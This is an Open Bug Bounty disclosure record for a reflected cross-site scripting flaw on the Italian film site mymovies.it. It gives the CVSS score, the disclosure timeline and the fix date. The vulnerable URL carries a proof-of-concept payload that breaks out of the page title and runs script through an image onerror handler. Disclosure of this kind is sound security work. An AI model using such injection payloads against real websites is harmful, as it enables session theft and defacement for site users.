mymovies.it XSS vulnerability

2017-10-17T14:14:00
ID OBB:340987
Type openbugbounty
Reporter Xaliom
Modified 2018-02-19T01:27:00

Description

Open Bug Bounty ID: OBB-340987

Description| Value
---|---
Affected Website:| mymovies.it
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.mymovies.it/database/ricerca/avanzata/?titolo=%3C/title%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3E&titolo_orig=&regista=&attore=&id_genere=-1&nazione=&clausola1=-1&anno_prod=&clausola2=-1&stelle=-1&id_manif=-1&anno_manif=&disponib=-1&ordinamento=0&submit=Inizia+ricerca+%C2%BB

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 17 October, 2017 14:14 GMT
Vulnerability Verified:| 17 October, 2017 14:17 GMT
Website Operator Notified:| 17 October, 2017 14:17 GMT
Vulnerability Published:| 17 October, 2017 14:17 GMT [without any technical details]
Vulnerability Fixed:| 19 February, 2018 01:27 GMT
Public Disclosure:| 19 February, 2018 01:27 GMT